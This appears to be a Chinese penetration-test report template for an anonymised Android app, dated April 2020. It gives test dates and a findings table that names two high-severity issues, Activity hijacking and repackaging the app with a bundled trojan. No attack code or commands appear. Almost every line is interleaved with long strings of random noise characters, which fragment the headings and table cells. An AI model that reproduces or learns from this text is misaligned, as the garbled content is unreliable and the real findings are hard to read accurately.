& a; H. p% P; q
- S. b6 x$ w" S3 [
" I9 B/ k; V ^# M9 f; ?8 B
; J' X, {6 D& P* S* a" P0 B
; G- C% n5 @ A' Q9 m; M) O
" g! \" T3 Z+ T( T, c
& F/ K- J$ m2 X. v9 z
: R5 m1 v+ }6 O0 d 2 I! d, H* E- V1 e* q) v
5 K5 D3 [/ J$ H$ P $ l( j# ^; \2 g- _$ w
; [' I7 _1 J4 [0 f0 Z& ]4 Y 文档编号:
9 y$ H% f6 K7 D' Y$ @" Q" A4 Z9 _+ n
0 {! |8 C$ b9 Z$ c
* i! g+ @' B5 u8 E+ g; f5 P2 k( w% @. M( e% W! E1 J' T
p* D z7 {+ ^( Y2 w
' j9 r: e; _# J5 Q$ r% O0 j
U S K L7 @$ @' u- u! W ?( t* ^' M) p7 o3 X# s
# d8 m- P7 c/ v: r; Q0 z
: k3 [- f5 c! M. Z, B
1 A. [) j4 V1 H) A& j
' L4 r ]6 U$ t$ E4 C( J8 W; Q9 {
- L' k: W2 v& T! ~& h, {, x5 ^9 p- {
W! ^/ v, T6 p1 K1 B
) Q8 K$ S) l: _ 8 S( G* j) ?0 _3 r- j! v9 s3 W
; C% H, V% c4 E& C1 J8 T p & l7 }' X+ [0 ?# Q' r: E+ D1 C
% b: O/ k3 u$ k) Y, g' ? Z9 Y
4 A( b. \7 |" A/ V: V! I& L! l+ U `0 s
+ N: L- p/ o p2 r2 d6 W# |9 z1 ]
" Q; M" T4 E1 l+ B$ y- I3 H1 P ) ~- h6 h9 W U/ k
# b" p" h7 S% U- v8 S! W: [
3 `# ^, _" d1 Y" m7 I2 P% o& i0 e" l& U
9 |& j. ], u1 \% f& A5 p* f$ o# S, l; F
3 m( B! f1 X+ k2 ]& c+ [4 k( H
# t' c& w0 Z6 v) o- ~) a
# {8 [) Q$ D4 j: X! n
" l, K( y; }8 z* l. W
2 Y9 d. \& m) m! n1 M! M3 d5 c i' h( V7 M% k% }( l2 m
某某某APP渗透测试
5 ^: y! b. M' I" x9 t; }* s5 k# F* A# N8 D
; N) F- v: J7 `6 [' m! e- i @- d5 N. k" T1 f+ Y7 D! t% j4 |% n
9 D$ l9 O" B' s. U* A* o4 ]3 w9 I9 A: c1 z$ j/ R
8 E7 f) T: f6 u/ d. [; X% l! c# \! m$ ?
, D9 Q. ^$ L. g) X% X# y
6 Q/ O0 D; F8 ]5 Y! v
6 E9 q7 u& |. Z2 n: w( t
4 S) W, m, X$ x& J+ Z
; e+ i C% P# c
# b1 z( J/ ^9 h) k# _8 P% b5 ]+ m# M2 o3 V
0 g$ ?- U* O, j+ N) W# L! ]
; u: d& }3 b. u! R/ c 0 @) {. Z1 o" L z6 {0 s' U
( @' c0 F. D3 @3 w
- R9 O# Y* T5 {9 v, N6 V5 ?
; w% G# a) E3 l
' D) H4 Y6 Z) H1 f7 Q' [
2 B# h0 l' l9 b$ R4 h/ `/ D
! S1 s7 _/ W2 Z6 r
: ^. g: s! E# W, h1 ]" a
: ~% O3 N' p, O: e# J
6 I& m3 R. m8 M9 o/ h, Q
$ @% P: B8 `# k& t
2 |9 p" D. X# Q; H5 R
% y( t0 [' T! }! |0 ^3 L
4 |& t% A3 U/ W. J: V Q0 ^* U0 R 技 术 报 告
) G3 `7 h, A8 P2 H
: X/ H; f5 Z3 j
# m- O. K% d; J
. g H d& Q$ K! e
5 N* h. F0 S( b. Q# L0 |; f; z3 ` `& S4 X- e) P
9 d+ f4 z2 k# i9 ]8 @# N T% ^" h
, k5 E i4 Q& ?1 c7 k
, q) T% m1 X$ ~/ @5 ^4 q
, @* c! I" a2 f& L: B, A% `5 p( [% w; L* x0 t: `1 K# u" ~( N: L
; |3 B S$ f+ t+ S9 A9 f0 r9 F, _* \, ^) W
p6 O: J0 B' A6 P& k4 N' Y
$ B; ~9 X0 z: ?# N# r- R M! | z$ p9 A9 F
' O9 m& I: D/ K" ^ 6 h+ d4 r: T e) ^0 B
: u0 e5 y/ W9 Z1 Y9 W b+ N
( _8 U2 k5 j2 a2 b" p+ g5 h# O1 Z! S& G
1 T6 V9 I" {% [6 n2 I) s5 b/ B' c
& q& G3 a' q6 m1 i; ^7 g1 A9 t. G3 _3 F
; u9 F1 W/ `& L& Y" z' K; T$ s. L' N8 F7 A, o3 x
/ m, |/ Y4 l9 k, }$ n/ P
& a- J f' ?8 T& H6 k
1 k% w4 ?) N [' S; O
" G$ U% y( M6 } 6 X5 Q" u( I" T9 v
+ D# i! ~" P/ n2 V+ D: M
: ~( o+ T! N# `& ~' q. u) m$ A/ B1 r7 ^+ w* V# ?
; L1 X" i- c. x& \% O! u
$ U, N8 z0 ]0 x) D. A4 J
: X1 d# g" Q& @2 {8 V1 Q8 t' u0 x: B' ^. E5 V
$ K! _, W6 h/ @$ E' Q0 h# D& M; p% `5 s' B2 v5 [& J
* O$ n* T2 H' P+ R
K( I, d. b7 S% ~
6 e7 T$ Q: L6 u; c, L" g+ a* Q: g1 u9 W- A8 _2 g
" y0 |& C- f, f/ c1 Q9 N2 W; b) u" t6 M9 W. C8 g/ ~
3 \ E! L& S" ~- y9 Y/ B3 m3 L! S- o6 }! \7 H% c# |: i* @) d
5 w& k/ W" f B% ~1 F2 K( Q$ O- w( S3 y
5 E: J! A* D0 T8 O, p% r
4 E7 P% ^% |/ O1 ^* ^, \
4 z6 k5 ], I8 w+ W8 `( Y
& M* X) @% D0 v# x; [5 s# ?+ A
( ^# G# c0 u- ?! ]: z/ N3 M9 j- O, c- {; @" d( a
1 }, T: A/ g9 y" p7 C
+ d8 \$ U, r& E" P
' C3 y' v6 L9 m' Y4 L1 \0 y2 J7 p z$ p% L3 [
p4 H0 L! [' \$ @4 J" q( m/ t, X5 G5 v4 G4 y' D! y
1 z& v% m' q q/ q) C3 v k
, x; a7 x' O( H, ~" M8 h1 N
+ d- q4 Z2 P, {/ t1 t4 i8 E$ q8 z6 c6 \6 @6 k( \
$ n+ ]" F! g+ I8 i8 x
2 \+ r4 ^6 [7 I8 N: L) _
' @, }! I$ B* [/ Y |5 d% ~! J2 D7 O
4 }7 t% X" c0 m9 l
" d2 M6 k- U6 p& [: S
3 C+ `0 a: b5 \2 ~. O8 j: b8 t
( N; q6 B- k1 ^! v! |3 N' H$ `+ E6 v% n: ^3 n" M, x7 S) N) C
: R. E8 w3 F) v* K/ K6 V
: n: m7 A+ q# L3 ^5 E3 M) M9 L3 Q8 d9 Y
4 D' Z6 i% @2 t1 n
; j- ~6 j" k6 j$ j+ ~( p0 d 2 J- P- s& t/ H( B
1 b* e* |: E% g- c2 ?
- c8 X( q) \9 F- q. P- Z5 ]; x* J: U8 s" `& y
' M! T" f- e* y1 h, {7 m4 N7 X5 p& ]" t$ q: ^+ h+ t+ t1 r4 h
" n( j- p9 x* c1 ?
3 X& R) g* Q7 v% t2 W; R
- @- Y k7 U' j1 Q4 `
- B: H- N/ v& @* C- x4 u% }
5 v9 A+ A* s8 u; ^
3 W9 S8 y( y2 h
3 y7 n( V3 O0 B; N" f
, | C* R" z9 o5 ]# p3 K: i4 y# w
, r+ O! W) C8 \9 V V6 a
* p- u+ n" e% ~3 _* H
* H8 B; r2 a" ]& i. J
6 A5 _/ B& r" @+ p ?9 I 6 A3 F: J6 A8 R; p
( l8 W; D; s/ [, f
& g& @; R$ H! |( T$ R3 ~8 d* `
0 Y; t# i9 T; O* `3 l2 u" N0 K; v
" L p/ @$ F, _& ]- q2 Y+ F. e S) U1 t) j- H2 Z
w3 U a; {/ R7 x
- V9 N/ _7 h: k5 C- D
1 T# J8 X& P+ C. Y1 ]
+ ]# A& v; a7 \
! [3 D' q0 f% ]6 V8 U
. M; ?5 V" ~2 V0 w# t% p
1 }& d0 G4 l b- \( U5 {6 n
. Y4 ~& ^, l, ^" v% t
. d7 y' V5 `) d5 h# f5 p: m; t z# w8 _( L+ D, D, k. S) `
0 T: s$ t6 C! e, T) s
& T/ b0 @7 G; h9 ~$ h4 H! Q2 d 二〇二〇年
4 n+ c; x- {/ ?3 e* c- k" g z
/ E# ?- G& A6 o) s* d
4 Z5 T- S# M' J: i" }
6 ~) ^2 o) A3 {
$ x$ P a4 f9 k9 i& q
; u0 }' i# M/ S& n" |( \( J
7 h3 P% Z; a& W/ e' G
, Y4 D5 }: R: e6 A7 G% w; v
4 C6 o# k/ J8 \9 M! N. f. G
" D1 z; h y5 e . H8 ]# Z# Q0 f% i- {0 p1 n
) M/ h# J" z2 G' d" n$ c
: I! M6 n% ?+ P& W0 t. k
6 P) K$ B. j* i
+ R. u% ?- E5 Q# i+ h' Z; @' Z. X7 ^1 Z! G# K& H* ~1 |+ C
" }- e5 |4 V* N! `
/ U* U4 F- v3 t7 s* c
* k6 }+ T+ v- N2 ^1 D7 U1 r
7 n5 \5 I& a+ Z; i! Z( V
8 ~6 h! o5 ~. Q$ U, @
% [. a( {/ m7 n5 }+ h 目 录
' I3 q# M( o4 E8 h0 N* y! y- A; f5 s# G _
) }2 g8 ?# T1 m, Z& e* _! S& |0 |! y$ }+ x4 L' V- o/ e
& J/ k6 M% y) s1 S l# n, x8 W
) ?! Y5 z; X' e& a! n
6 \ m2 e! L# R0 M4 A( V4 f) g5 Z8 K) h5 P, O
3 b9 z' `( j! S% Z0 e
; V+ s. D+ R( A$ f5 j0 j
: K0 Y! \1 k' s8 K. F
4 v6 x( L1 t5 k& S0 b! r+ o , O( J8 C' t) Y
: {( L- c' {) j0 r; f6 M3 M, V 1 概述... 3
+ n- e z# n- E7 |* X: [$ ]; x$ ?# S) f# C/ G8 n
9 m9 ~8 ~7 I6 u! N. f% B
/ d5 \/ d' v, q% \% S6 z/ h B p
( f9 p( k- P( X3 B! p$ E' F3 B9 U
+ k7 k3 a( q# g) M5 k0 j+ t9 R 1.2测试时间... 3 0 g- ?! q$ w* D# r( A3 q1 m; y
: x! A. M r5 {% M+ ]
' e+ H* I2 S5 m; s8 e0 Q: h7 M& S" e% X- T
7 i+ }& G, D6 l- z- s$ J
" J$ D5 D' I$ m6 G! b& d 1.3测试对象... 3
5 {4 M4 _# o# _$ R5 i/ V7 |" \
8 U. v. B" I# h# F1 F, g" F
$ ~1 }6 W8 v2 o7 w5 ^
/ w {' p* r% L: W/ \
8 I: W0 S( F2 p6 [2 X0 t t0 l" F6 d' {: s8 s
1.4测试结果... 3
; @: u, t; ~6 H- `/ g3 x$ c3 W! {
; ^- L) t& k3 J2 ~0 K, N0 d; A2 E
$ Y( U0 Q; S# O% c! N/ }3 ?! O
$ b' g0 \8 A! \' f
4 p8 ], q4 A ~2 o. ^2 k8 n% F6 s# s1 Z: @& g/ P3 i. ?( B4 ?
2 检测结果... 4 2 P9 M* D* V9 V0 O+ R* R% d, T6 v
5 r" |) X1 y: m5 Q
/ j2 G6 }) Q4 Y: l* n
. }" @9 a4 \: G& W- u
9 N9 W6 o- l* S5 p6 d4 W4 `& _+ _+ Q0 ]3 Q: e' p) e4 |* f1 a, b; O
2.1 某某某... 4
: `8 q: @( O+ b0 Y, t. s3 _, v7 e* `8 F! P# i
& p2 v3 V/ H1 q# w
' a6 B! o* w, K6 ^8 F: j : M: F* n2 ?, k! D% l0 v" ]8 |
% ?$ `1 J( w) X4 g
2.1.1检测目标... 4 1 F) @$ l+ h. y# g9 A
% K6 p( B# e S
( [8 I- R# L: J$ ]6 M" n5 S: S. q+ I# t+ w* e& j
: {) H& {/ [7 V+ F$ U4 A5 ^2 j. L+ {7 \* F$ W0 z" d E
2.1.2检测结果... 4 3 [1 z& d3 T% a% c$ I% q" R6 }
8 o: A$ n2 ?# C4 i
$ R8 w) R5 S4 I. o8 s
7 m5 j4 w1 B# n# b" L4 v& Y ( e/ t; C* V* Z: g9 L% l: s/ _# G
. R% H' V) a8 i9 B 2.1.2.1. 4 / o# z0 W: f& W2 a) c! d
7 u9 m. D! J# l ?9 T% [! Y
7 F! O. U% j* k% T/ A& y6 D8 e6 T$ X0 Y$ X* w( d' t
+ Q+ D9 F2 F0 x4 J. g* k
7 [/ G9 a7 B: A" ?' t+ G& ~
2.1.2.2. 6
5 |; o* E! w i3 @8 M- x5 j2 t
1 F1 K6 ^5 L+ I; l9 h
" P( }/ k- s4 I
) h5 Y( W$ T6 I' ^3 s! b
# W6 k, J$ L/ @( i# q6 z) P- B7 A9 h. ?! }* Y( K3 n( @& i% K
; I3 A5 ^8 M! h' G8 _' z+ x
. M! q, V' ?# p; x- L. ]! j5 n
0 Q* B6 x2 _+ X! Y
! z8 O# P2 S5 j! n
5 Z) ?7 R- F* v/ s- I- e. l- e
7 Z2 s2 y, f: A/ d! K' G! I 0 z. p' v7 {1 V* q- y
, J& t9 }/ {& j5 P3 `7 K
i6 t$ R. x2 s0 M% r
- E4 V! r/ V. ~: j* p* e7 m! Q
+ Y# W1 E1 ~' }7 S3 {
* I( b. x9 E7 G7 i) Z/ [5 {+ K 3 V! n9 R0 f# `
3 i" H. Q1 d I& I) [ 1 概述
; r5 o: d9 c" b0 y$ b; {; Z: V* | [7 ^7 R+ V, i: j
3 N1 d) i6 j F/ x1 S% u A
5 O( u0 @) W0 c# \
3 L' A% O; f K7 }2 _) \8 U# P6 V8 b7 e1 {5 S5 ]. Y
1.2测试时间 ! j8 r7 J. G1 }. q1 d
9 N5 \3 \" Q- V( T$ s
8 G! ?+ O1 @' w, f" X
2 N R& B. I; T4 }9 m , G! q, a! x) ? a: w% `* J
$ U- y$ }% }0 w* v
& I6 P6 z8 r. v7 G0 h9 I) v
0 q) ^! p6 P( w- Z f: l! N
( e$ O2 Y/ g! B0 T
( \# e5 q, a9 `$ m- o# ?6 {
|
% @/ w8 @. a+ M* v6 k5 r9 j2 r" Q& d
" }; y8 c5 N+ S6 R6 D5 a: Q$ f
6 h: v/ S, F6 \# Q6 W* q
渗透测试时间 & m! f6 I5 i0 K5 O6 \ o% m
. G. u+ v5 j* ]+ D+ }) f
" i: q' n9 N6 k" T# {% Y6 |' |
( t, v W0 y& B1 j5 H, V |
1 H% b9 I3 F) c O; Q2 v3 `2 G7 V
0 R \8 }4 a" C! ^9 k3 a
9 I- F0 J9 a' G$ @
8 L# j0 T U5 [* j# O
- {; V4 A( W% M, t8 I. |$ B
9 r. t$ m) g9 B | % b9 f% T7 ~$ T J; @, e
! N' F( r! t( b2 y4 X) w 1 U, ~9 m& f' t R/ a0 x
& T X3 \+ t2 E5 }3 j 起始时间
! W; P0 w! p' u3 j" n( B z0 ?. {
. F4 f1 `5 E. J4 {4 Y, s$ ^
s( k: B8 T1 W* a5 D) @. n7 a% a9 ]# G0 `3 P
|
% v0 ^0 N$ u2 c2 f1 o: g" N) [7 ]1 v% O7 C
' r. u- U8 C8 j9 ^; h
( k4 X, N3 H7 |0 ^- O" T& g8 ^
4 l9 M+ W; M2 h* [, F+ K
) g, S. ^3 a" ~: Q8 ^# l4 f- x/ e 2020年4月6日
3 z. B. `: `3 A* h
2 I6 ?) ~- C# d( [4 A
1 W: e5 P! O& B: J0 `3 v7 [/ ^
, }- | ?! L% ?6 B, g: H: b/ | | ! j* ]3 V5 B( b, `4 _. n: w5 F$ a9 b
9 m/ h6 t! k: p n
7 I3 p" W: A4 d, @0 p
7 X+ c+ {. B% x1 L# m7 j$ E ; `9 {$ Q: O/ x
! @- ^! R% {3 v |
5 D6 U, ]" ~% W7 ~6 ~+ H" f9 ~5 i$ v. t
% g! y3 a5 u& ^' ~" A1 K. m( G' H
! ?1 A( \: @1 N) h$ c: \3 \ 结束时间 + r2 M% E2 K7 M6 c6 S
# Y" D; X8 F% N# q& q0 I% F ! x$ l; ]/ o* L' S) ?( V+ d
/ r$ I% K6 s3 l! y( q: x+ D |
* V+ n' o. C9 T" W
& b: y5 i- ~, g' v$ |) _' a3 d
' n1 E: @' G, c$ k7 D, ]* C/ N% W$ [! ?& N5 }
9 E$ R- t0 Q% f& M) i9 b2 f
d2 z- z! P& Q9 r! s 2020年4月9日
/ V8 u9 y/ P7 F. h5 @4 F6 N6 t) |1 W2 m' A9 x4 o8 o9 J! H: p
6 T- S# Y8 z* t4 G! u+ |- p
5 r9 [# b) j" p- t; Q | 5 ~ g: W( S8 f" N# o+ k3 V
8 P; W1 r$ U+ s) s% U- h" h% A
' ^. Q2 a- `5 S, e
y' x! k- H( r8 H, I
1 F) B5 t& m2 u/ I) |& r1 g! }
" L4 N, k( @: U/ u' c' L
: i6 c4 n3 }( @ M: Z
0 B2 z1 q# N- O; h- W. i' F& j 5 {/ }+ D" a- G' {
6 b& i( c3 E- o! C 1.3测试对象 6 [+ b8 y$ \* v2 ]
\; x, B) i1 `8 }7 }& J: W" u
" j' { f" d3 m
. c' r' A$ E3 o- O$ r) f6 z- e ! [# w8 R+ m7 J' m
L" D; y l. b' u
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ' ~1 o# T4 o" X" P
! [8 R/ k& p1 R) s* }! y5 Q
9 J4 b) V& m% O9 s
/ u) ]/ E" ]* {% u' ], u
0 m( `% j% T' o' |! b6 T% @) `/ T# r D* ^
表1-1 检测对象
1 j$ U+ M9 h: k) Z! o
# Z' D/ e6 m8 s5 z% ?" b9 O; t. x
. D: `1 V$ q' e. x# ^( i2 l8 \
( h7 n( B7 _5 u8 M! V6 D 6 G" O8 q6 W( `+ Q! }
2 s! [6 U9 J4 T/ }# g! s: ]* n# p
% P1 q' m9 N8 E( `3 m$ }3 X0 x# j' J
2 S+ `* _- |; S# q& m% Y& h, P$ M" a z; t* n, x9 K
| ( z* {7 ?2 \# K% @1 T
) i! [! W, g, b; E) f1 s
4 H$ X( { i, w% {6 L* L+ L0 _! ^% M) ?' C' C) \2 l4 }, S
序号
! j. s% n% r6 l+ W
% c6 e5 R2 t$ k- |1 E
" N, Z. g: N( J
k+ }0 K8 ~% |' H0 k6 |! v7 w% }# y |
5 s5 S9 t2 L& ~3 R- b4 o
% R' n* Q' e: R4 ]$ v0 d" u6 M5 g
9 `$ B/ T; L4 s: C) G
1 u+ r: |. ]* {" B+ v( I : }$ M. `& o% z' j
4 z, E1 ]/ E; Y8 N+ i6 L
测试对象 & p2 W$ U/ i1 E# l
% \6 n% O& x9 A$ ?' d m " e% Z; A! w/ {0 W) E5 s
, P/ p& B% X; q: T" r/ b5 n | : b2 F. s+ O m4 ^
/ _! E; R5 N( q$ @0 @+ D+ n* I
7 w1 E0 K" w0 n+ l+ {, D/ D
1 W0 p! W2 v) }1 m/ K
+ Z! a0 C$ V2 R) G
2 A+ t( z1 `# N 测试地址
1 L$ l; O" J c$ h) I8 D2 I! l4 t* G% H/ |) u- r' b# I$ o
4 m! x3 ?- t+ a* A7 v5 B
$ } ?4 V+ g/ i+ ]* T | ) B5 Q' o3 R" l m" _" ^4 h
% g6 z0 G& f: E) L4 j4 L0 ^4 ?
) j2 x! y5 X! p" W- B4 @0 t8 s7 R
8 W7 k, U+ g$ P 2 H$ T1 o( o. d2 t# J4 ]! r
$ j4 ]/ T, n0 S$ P4 U# h- ~0 a" u 安全漏洞
^6 `0 b$ z! b: o2 j7 d
( r! `( z9 P; [% m
! c3 g- t. v: h% S# a0 z+ B0 Z2 s8 Q: H: V
| , A Y# M" a% M- e
/ H4 z' X5 J* l% E# M9 x, U
- H/ a* u1 z& x) Y. t6 w0 K% q! v2 c% z9 ]- }( D
/ t6 C& C7 v/ c, K6 Z* o7 p$ u. |2 |, ? c! @5 m6 |( d( s: C
| ' r* d4 U1 g2 i; o6 ]% S
8 a2 Z* }- i( A9 c
1 H6 m$ O1 g" T" E' P8 C6 C' z
4 Z1 ?6 n* W8 ?1 f1 q, c 1 1 p3 G7 F. H2 e A
" ]3 \+ Y4 x4 n2 W' {& t4 S: A2 O
5 r3 G3 G8 E7 d' v7 m
5 G* a: g% z! H% B1 a
| / z1 R* a1 @% M* `4 K
( y7 w0 {- ~0 h' Q8 ~5 `( W
& ?# C0 F3 [0 ]4 f3 |; W0 h* x* B0 q% o- c
) y, r% d& m! B( Q" n& o
! |6 E/ n) @6 c" h3 B+ ?3 e 某某某安卓APP
2 n0 N/ U- e) {/ \8 G5 q; G2 x; K5 E/ B. U3 C$ a. s6 w9 x
0 E B) q4 i8 Q! r" r% u; q* o; G
| 4 x( w# Q- Q, k6 m% X
- i5 H) d- F) @9 z+ O
& f @8 i0 n, m* ]9 h, p( }
4 w, e {. {, P8 I' ? 5 b, ]6 `' x" m5 q1 B
* p: G$ O( m' r$ R. x & ~4 T |, E* h$ a! {# K4 x1 k7 [
; C# I3 v6 g1 M
& T) @ V% p x! H+ z8 m! c" w4 J
|
! i, W4 D) E8 v5 {3 m- A# i. s8 z; y7 u' A
# F2 |8 ~0 X Z) E3 X* Z$ E
1 Q9 i& j' |# |: W- \8 Q
* c) L- e' f* ~( }+ w* H& R9 f6 Q' d8 Z
2
# B% p5 X8 E) N9 Q
5 M/ j( q' @: g0 ]. ?9 F
. `. L* t; s t% Y% V6 N
% o6 V0 Q# b8 l" R; |, q* { | , {0 Z% g$ v) r6 q
# x5 t# `4 W( }
! Y& u4 M7 l# V% D4 T2 m, D
/ z: i8 p" c3 n ; O& ]/ [; C% e" f5 ]& N# {9 I
( R$ U# ]% b& T- f
( k, {" [! u- N+ r+ B# x% D
& M( y, {: ~3 q
7 Y, H3 U2 ^9 m% y* |/ l! T% }; t. d- s0 R
1.4测试结果
" P% f: K4 D4 H8 \9 R8 V
+ J% X0 g4 S& k, s% l* l
8 X e% L+ K* I& k
4 S2 y8 F8 {1 U( u/ V$ E3 }! f
9 b% g3 M6 p8 i L! D i: R
) `: Q8 t. S; y! p, `2 W4 V 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
- P4 z( j% w( ?% ?
- Z& `; n* ~) b1 x: w5 [; A- V& z
( {, W7 X, e |* N m* ]
! e5 h5 E7 }4 g; ~9 t
1 l. |5 k& d, h& I2 V) ]! I! x# E8 y- @1 M: d+ O- I( u+ ]. ?! T+ [
, ~" O: O8 r* Z! O' b
' t5 _) Z- S* k1 n( R& }# N# a1 w2 c3 ^
5 b1 T4 s, ^& v8 H; d- r4 h5 r6 P1 a( k5 `) R* a. S# ^0 j
( n! j' j1 b Q+ V
* I2 ^3 \* j. H7 A1 |1 b$ D+ r
' c8 R' i& W, S4 F% Y& U; C) P9 e1 X# c7 F. O- \; C
4 z8 A% c* ?9 z9 I5 H8 r- {4 f
$ Y! f2 a6 `, K8 ? 0 e( S% g o- Y f
& ~! i6 r+ U! P/ l' @; w | ' v( H( |7 U2 Q
4 w5 U% s4 R, Q3 n
* N6 ]1 h8 o2 C" T/ `0 }% N
2 {, p0 v* n; R) l+ d 序号
) \' P0 t# P7 \0 f! D' o' Y& ~# Q; g$ K) f
; H" b8 x3 i1 m T) X- h
7 G) ?& ?# p) T) {5 o! j7 V
|
; V( {5 Z Y' p8 g( v) u- n* ?0 S$ T/ }- M; `! L3 Z/ e# a3 H: s! X
. c1 a9 w$ b1 `' n; o% _
0 ]) p6 u; \, L4 a. w # x2 a2 e, O! ?. n4 A
+ x. B5 w$ M+ F 系统名称 3 B; } J- I6 _8 S9 c
* ^) y8 l7 r3 t( Y; j9 g) Q* h
: O# [8 v0 t# t+ M' [2 @
# y- i7 ?; s( C, Q9 [ | 3 e7 ?0 K3 g- p7 k3 ^$ ]2 c: V
7 X2 H, o5 s( c+ h2 [( W
W# o4 d- b1 j* c6 q* F- m) }
& W1 R# ^* a2 @* t2 Q! c% v7 F4 U0 a 8 ?( J0 n/ r* C( n T4 U
& d2 H& x- r! f E5 B 漏洞名称 , ^7 p o& ?* `. V" m
+ L7 g2 b2 ^1 V. e+ Z9 ~: g: [
5 I# {. G! Q- X) Y- u+ S( v
0 Q* w! E% _7 w( c/ ^
| & {7 d# x- I: ?. c7 f. x3 m
, v; j+ N; z& |6 }1 N6 N" }8 ` - a( b+ E$ U4 U0 }3 {: [* y- q0 e
" z+ v4 G7 {" G7 J E& r+ O/ R: t5 j
9 P2 h- K$ Y& q5 G; v, y
& i/ Y! f' b. W& Q ~; l 漏洞危害
+ ?3 v# c8 l% C) A
4 G3 @. M- c, o8 a) c
2 A$ W* ^8 I' `2 s" j8 i7 C: ?# F" K3 D F. W6 h& Z8 f* C1 J$ v
| 1 m. q1 w# ^9 _5 Q. k8 ^( X/ g
! p: W k5 ^3 V, n0 W, n
' [5 u( `' H7 M8 D) }- c" z$ }7 x6 r8 c
; |8 A# u0 w- A
: X6 W" s5 D: E! m: H. A, r3 T# F' H
修复结果
) r3 R- J2 c1 Y: t
# U4 M7 l W: x' p+ K& f: H: e
) g: s& Z( o/ N& e0 U& W, u$ c" S( ^: L4 e n3 L( ^! m( r( m
| 9 `. a0 x) V& Y! L
% u: ?& F* ?6 V, F% |
; Y/ j: r5 a @$ Q$ B8 O. [
7 {# z( n" z% M% u1 z6 x
7 l9 p1 q) u' M$ g+ F- D: l( l( [9 Y4 O, D* |
| ) K6 m) d; v, Z0 z" V
: T6 @: U) _8 p; b3 w
% j$ g: C( C& c! y% k
% c6 s( X2 a5 A- g 1
0 }% a+ f) C8 z, [% ^9 i
7 e; l5 a0 i }. E, K
7 T4 h7 g& m/ v
1 \, J9 c0 Z) ~! q | ; A$ C: l5 t' L2 W& l; B6 Z8 R4 u3 h
& S) D$ M+ I. g7 C9 k7 m : e% H4 \) J; B3 i0 l: J
9 W4 d9 N0 u4 L
& z/ C: @0 c# m, W5 i* j$ }$ W" O, ^7 p) {1 C T
某某某某某某APP
2 k8 Q, T( S) q5 F/ X! E$ x( [! K# u( ^$ {+ ?3 h% L* q
6 r- f' i6 Y5 }: j7 g( k# h* m) H0 u( }0 \- j
|
; O# J+ L1 g* |% p9 E6 N, X" |1 s8 n/ G: G6 P1 N; w9 W1 W
# m: x/ G2 f; V! a5 x0 _- `4 {) g L
! }: b- r' |1 ^9 ?
- |" c) _. Y& G) N9 V- g7 t- ?9 d& y
Activity 劫持
9 i" w1 Z* Y+ `; p& r2 C* j4 e/ r0 U& F8 S
) e/ ~! X; F0 x
' g, w. h# t7 X) b: D' J8 ^
" l! K# N! Y8 e# ]$ E5 d* E6 E2 B/ @# V7 q: V9 e
7 k0 H5 Q! A/ M# ^# p) N5 b
$ r* ^% Y4 K- z# F
* R. u+ ~' ~/ \% @1 _
2 @0 W1 i9 s( s+ F# { |
( i5 H1 @. D [0 p
3 Z2 n5 o- }) \% e" G7 r! A # Q/ h5 B+ R {# q
% P( v: J% W3 \/ y) F7 H0 B" t + x5 ~% c& K1 ^; P, o/ @' J/ j& a5 L4 V
2 I% d7 P/ [- l4 K# D
高 $ ?& l8 e" K9 N; W
) b% V2 a, i* X6 F) b- X
- i" E: Q7 e( R5 \
/ j2 \4 Q; V& n) d- L6 n | 5 f# v- p' w) q8 _5 b3 V. X
E) E" e' g" L; F) s9 M& @
2 g* i3 Y- F. I8 z8 \) D
" `7 U2 V' L: k: [# ~# q5 W# p" t( B; l 9 q f9 u: i1 f9 J* J5 q
& z4 e+ l7 w2 G
& \% S4 w! I1 d, D4 c5 f1 O& G' n0 ]) X8 d& g+ b* S
9 h$ m/ v$ z$ Q! u1 I' \ ?8 q/ x8 t8 t, x2 ^
| # J2 a: d* B- j
! T# v) [$ [* P
) }3 v9 G6 F9 R: g/ U( Y$ T
z: Z! O8 \% t B/ Y' t3 c! `
6 u u6 v7 g) k. W2 N: ]
; D7 U; ^$ S Q! B3 d |
* o6 n, P5 Q; ?$ s* v6 Z
9 K8 S8 s" z3 f+ z4 S9 l # B9 m& X2 H" Y% i' u# J5 Z
. X( C+ t4 A- G# Q2 ] 2
5 ]0 \' ~: _7 l2 \8 ]4 F8 {' \2 ?4 a
9 ^* q* ~( B# S" }
8 X4 |4 ]. X$ q' T: c
| + i6 H" f; F. t$ p7 j% I+ F
8 P. c9 K8 F- b3 ~7 y# V
1 ~ } v& \1 ^% a# J; W. Z& K: p9 F' p7 @; U
" Y8 T2 y/ `! T& m
: |8 g6 s% s( u; h 某某某某某某APP # _8 a( y! p: J9 J7 f$ s
% z6 k1 J7 B, B. ~, c8 {* \ ( B4 D) N. ^; _; z# d, o$ l
8 N& e% r6 A0 Y1 X
| 7 r3 A+ w' P3 E
; G4 v( f; ~9 C" ~
$ r* b8 N5 p7 E: p9 [# _8 q o
1 E5 I6 S, x# l/ N) H$ ^' u : c- ]0 X2 r% f5 M2 U6 {( c9 ?, x7 B
/ \0 S3 n( e/ v$ I, R 反编译二次打包捆绑木马、篡改APP代码
. R- {- F* }, c( T0 ?: F S5 _
# q; n5 t( y5 J1 B) z
' G! z& Y" x. X/ Y2 x* m6 P9 Z
- z6 h1 l$ `4 D- Q# C6 d& n% R! s | 2 q7 O# \5 t% Y* p( ~- z- f5 i
6 c6 ~1 Y( F+ U
4 d# H& a0 V' B
! v% t2 P6 j1 A; T5 V
# C6 D/ C% R% C+ j* Y- @9 m7 e
3 h0 X8 y# ~1 E% d7 {% t7 { 高 % K% n0 c$ R: t! s" A3 O4 y5 V
' c7 B( G$ q9 w& [' _% y- y
2 t0 F) A4 A! d1 _, y! @7 Z$ S c, g
|
3 Z5 N$ Q) @+ z$ R# ~7 N# v. a# o% Z% X# G
6 W* }6 g# D$ f$ x$ _4 o3 {
8 G! q- m6 b; H% I; N: G0 A* G
7 c% ?; D1 a( W1 c7 U2 T
w1 ^# {' D1 R) z1 D
4 t- N. p3 f: f0 w
* y& \: w6 {% r8 w5 A6 H6 s
) Q' w+ X7 e; [; B9 L$ U% }7 V; }3 w2 m, q
| ' V! j6 t" T- H8 N3 r6 L- W
6 s4 ?' p& T9 j. D
& h1 I/ D, E1 f7 a
8 o# q3 Q+ e9 p% j& f% G; e6 f& s 1 m1 N! t" L! M1 \* R7 g; t8 ^
# s3 z) \/ B" c/ O4 y! N1 I
